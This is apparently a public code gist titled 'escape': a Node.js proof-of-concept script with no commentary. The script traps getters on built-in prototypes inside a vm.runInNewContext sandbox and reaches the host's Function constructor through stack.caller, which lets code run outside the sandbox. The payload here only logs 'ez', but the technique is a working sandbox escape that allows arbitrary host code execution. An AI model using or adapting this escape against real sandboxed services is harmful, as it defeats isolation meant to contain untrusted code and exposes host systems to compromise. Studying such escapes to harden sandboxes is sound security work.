public
Created

escape

  • Download Gist
gistfile1.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56
vm=require('vm');
function alertMe() {
var Object = {}.constructor;
var o=Object.create(Error.prototype);
function stack(){
stack.caller.constructor('try{console.log("ez")}catch(e){}')();
return function() {return '0'};
};
var properties = {};
[
'create', 'defineProperty', 'defineProperties',
'typeof', 'void', 'new', 'parseInt', 'parseFloat', 'eval',
'RegExp', 'Number', 'String', 'Function', 'Array', 'Object', 'Date', 'Buffer',
'isArray', 'isBuffer', 'matches', 'exec', 'slice', 'substr', 'substring',
'indexOf', 'forEach', 'map', 'filter', 'reduce', 'some', 'all', 'any', '_', '$', 'format',
'', 'null', 'undefined', 'var', 'function',
'toString','toJSON','constructor','valueOf',
'length','0','1',
'value','message','stack',
'index','lastIndex','source','multiline','global','ignoreCase',
'name','arguments','caller','callee','prototype', 'call', 'apply',
'__proto__','__defineGetter__','__defineSetter__'
].forEach(function(key) {
properties[key] = {get: stack, set: stack, configurable: false, enumerable: true};
});
var defineProperties = Object.defineProperties;
[
o,
Function.prototype,
Number.prototype,
String.prototype,
Object.prototype,
Array.prototype,
Array,
RegExp.prototype,
Error.prototype,
Math,
Date.prototype,
Date,
(function(){return this})(),
Object
].forEach(function(item) {
try {
defineProperties(item, properties)
}
catch(e) {}
});
return o;
}
var str, out;
str=alertMe.toString()+';alertMe()';
try{
vm.runInNewContext(str);
} catch(e) {
console.error(e.stack);
} ; 0

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.